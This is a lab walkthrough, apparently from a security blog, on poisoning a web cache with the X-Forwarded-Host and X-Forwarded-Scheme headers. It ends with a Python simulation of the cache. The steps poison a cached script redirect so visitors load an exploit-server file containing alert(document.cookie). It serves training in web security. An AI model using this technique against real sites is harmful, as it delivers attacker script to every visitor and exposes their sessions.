25.3 Lab: Web cache poisoning with multiple headers


Karthikeyan Nagaraj
May 23, 2024

Description

This lab contains a web cache poisoning vulnerability that is only exploitable when you use multiple headers to craft a malicious request. A user visits the home page roughly once a minute. To solve this lab, poison the cache with a response that executes alert(document.cookie) in the visitor's browser.

Solution

  1. With Burp running, load the website's home page.
  2. Go to "Proxy" > "HTTP history" and study the requests and responses that you generated. Find the GET request for the JavaScript file /resources/js/tracking.js and send it to Burp Repeater. The home page loads this script with a <script> tag, which is why a poisoned cached response for it reaches every visitor.
  3. Add a cache-buster query parameter (for example ?cb=1234) so that your experiments do not touch the entry served to real visitors, then add both X-Forwarded-Host: example.com and X-Forwarded-Scheme: nothttps to the request. Neither header is part of the cache key, but together they change the response: any X-Forwarded-Scheme value other than https makes the back end answer with a 302 to the https:// version of the requested URL, and X-Forwarded-Host controls the host in that redirect. Send the request and notice that the Location header of the 302 now points to https://example.com/.
  4. Go to the exploit server and change the file name to match the path used by the vulnerable response:
    /resources/js/tracking.js
  5. In the body, enter the payload alert(document.cookie) and store the exploit.
  6. Go back to the request in Burp Repeater and set the X-Forwarded-Host header as follows, remembering to enter your own exploit server ID:
    X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
  7. Make sure the X-Forwarded-Scheme header is set to anything other than https.
  8. Send the request until you see your exploit server URL reflected in the Location header and X-Cache: hit in the response headers.
  9. To check that the response was cached correctly, right-click on the request in Burp, select "Copy URL", and load this URL in Burp's browser. If the cache was successfully poisoned, the browser follows the redirect to your exploit server and you will see the script containing your payload, alert(document.cookie). Note that the alert() won't actually execute here, because the browser displays the script as plain text rather than running it.
  10. Go back to Burp Repeater, remove the cache buster, and resend the request until you poison the cache again. The un-busted entry may already be cached from a victim's visit, so your request is served from cache (and has no effect) until that entry expires and your request is the one that repopulates it.
  11. To simulate the victim, reload the home page in the browser and make sure that the alert() fires.
  12. Keep resending the request to keep the cache poisoned until the victim visits the site and the lab is solved.
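To make the mechanics behind steps 3, 8 and 10 concrete, here is an added in-memory model of the lab's cache and origin (written for this writeup; it is not PortSwigger's lab code). It shows why each header alone is harmless, why the two together give you control of the cached redirect, and how a still-fresh cache entry blocks re-poisoning until it expires. LAB_HOST, the exploit-server placeholder and the 30-second TTL are assumptions; the real lab's key and TTL are not documented here.

```python
# Added example: simulated cache + origin for the multi-header poisoning lab.
# Constructed for illustration; not the lab's real implementation.
from urllib.parse import urlsplit

LAB_HOST = "lab.example"                                    # assumed lab host
EXPLOIT_HOST = "YOUR-EXPLOIT-SERVER-ID.exploit-server.net"  # placeholder, as in the writeup
TRACKING_JS = "/resources/js/tracking.js"


def origin(path, headers):
    """Vulnerable back end. Any X-Forwarded-Scheme other than https triggers a
    302 to the https:// form of the URL, and the host of that URL is taken from
    X-Forwarded-Host when present. With neither header it just serves the script."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("x-forwarded-scheme", "https").lower() != "https":
        host = h.get("x-forwarded-host", h["host"])
        return 302, {"Location": f"https://{host}{path}"}
    return 200, {"Content-Type": "application/javascript"}


class Cache:
    """Front-end cache keyed on Host + path (query string included).
    X-Forwarded-* headers are unkeyed, so a response they produced is served
    to every later requester of the same key until the entry expires."""

    def __init__(self, ttl=30):
        self.ttl, self.now, self.store = ttl, 0, {}   # 'now' is a simulated clock

    def get(self, path, headers):
        key = (headers["Host"], path)
        entry = self.store.get(key)
        if entry and self.now - entry[0] < self.ttl:
            status, resp = entry[1]
            return status, {**resp, "X-Cache": "hit"}
        status, resp = origin(path, headers)
        self.store[key] = (self.now, (status, resp))
        return status, {**resp, "X-Cache": "miss"}


def attacker_request(cache, path, fwd_host=None, fwd_scheme=None):
    """A Repeater-style request carrying whichever X-Forwarded-* headers are given."""
    headers = {"Host": LAB_HOST}
    if fwd_host:
        headers["X-Forwarded-Host"] = fwd_host
    if fwd_scheme:
        headers["X-Forwarded-Scheme"] = fwd_scheme
    return cache.get(path, headers)


def is_poisoned(status, headers, exploit_host):
    """Step 8's success check: exploit server reflected in Location AND served from cache."""
    target = urlsplit(headers.get("Location", "")).hostname
    return status == 302 and target == exploit_host.lower() and headers.get("X-Cache") == "hit"


def victim_loads_home_page(cache):
    """The victim's browser fetching <script src="/resources/js/tracking.js"> with no
    X-Forwarded-* headers. Returns the host the script is ultimately loaded from."""
    status, h = cache.get(TRACKING_JS, {"Host": LAB_HOST})
    return urlsplit(h["Location"]).hostname if status == 302 else LAB_HOST


def walkthrough():
    cache = Cache(ttl=30)
    out = {}
    # Step 3: each header alone is not enough.
    s, h = attacker_request(cache, TRACKING_JS + "?cb=1", fwd_host=EXPLOIT_HOST)
    out["host_only"] = (s, h.get("Location"))            # 200, no redirect at all
    s, h = attacker_request(cache, TRACKING_JS + "?cb=2", fwd_scheme="nothttps")
    out["scheme_only"] = (s, h.get("Location"))          # 302, but to the lab's own host
    # Both headers with a cache buster: the second send comes back as a hit (step 8).
    for _ in range(2):
        s, h = attacker_request(cache, TRACKING_JS + "?cb=3", EXPLOIT_HOST, "nothttps")
    out["buster_poisoned"] = is_poisoned(s, h, EXPLOIT_HOST)
    # Step 10: the real key is already cached from a victim's visit, so the attacker's
    # request is answered from cache with the harmless 200 and poisons nothing.
    out["victim_before"] = victim_loads_home_page(cache)
    s, h = attacker_request(cache, TRACKING_JS, EXPLOIT_HOST, "nothttps")
    out["poison_while_fresh"] = is_poisoned(s, h, EXPLOIT_HOST)
    # Once that entry expires, resending repopulates it with the 302 and the next
    # victim visit is redirected to the exploit server (steps 11 and 12).
    cache.now += 31
    for _ in range(2):
        s, h = attacker_request(cache, TRACKING_JS, EXPLOIT_HOST, "nothttps")
    out["poison_after_expiry"] = is_poisoned(s, h, EXPLOIT_HOST)
    out["victim_after"] = victim_loads_home_page(cache)
    return out


if __name__ == "__main__":
    for name, value in walkthrough().items():
        print(f"{name}: {value}")
```

The cache-buster keeps your trial entries under their own keys, which is why step 10 has you remove it: only the un-busted key is the one the victim's <script src> request actually resolves against, and that key can only be repopulated once whatever is already there has expired.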


Karthikeyan Nagaraj

Security Researcher | Bug Hunter | Web Pentester | CTF Player | TryHackme Top 1% | AI Researcher | Blockchain Developer